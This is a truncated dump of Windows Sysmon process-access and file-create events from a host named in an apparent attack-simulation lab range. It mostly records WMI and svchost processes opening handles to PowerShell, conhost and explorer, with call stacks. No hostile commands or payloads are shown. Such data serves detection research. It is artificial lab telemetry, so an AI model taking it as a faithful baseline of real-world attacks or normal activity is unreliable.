16:52:52.028{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D63-603E-70AA-00000000AD01}3652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x80000000000000002236710Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.028{05ADC7E1-6D63-603E-72AA-00000000AD01}6720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_1ct3bhve.xdk.ps12021-03-02 16:52:52.028 10341000x80000000000000002236709Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.012{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6D63-603E-72AA-00000000AD01}6720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236708Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.012{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D63-603E-73AA-00000000AD01}10076C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236707Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.012{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D63-603E-72AA-00000000AD01}6720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236706Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.012{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D63-603E-71AA-00000000AD01}8992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236705Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.012{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D63-603E-70AA-00000000AD01}3652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236704Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.012{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D63-603E-6FAA-00000000AD01}12376C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236703Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D63-603E-6EAA-00000000AD01}5340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236702Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236701Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236700Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236699Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236698Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236697Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236696Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236695Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236694Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236693Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236692Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236691Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236690Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\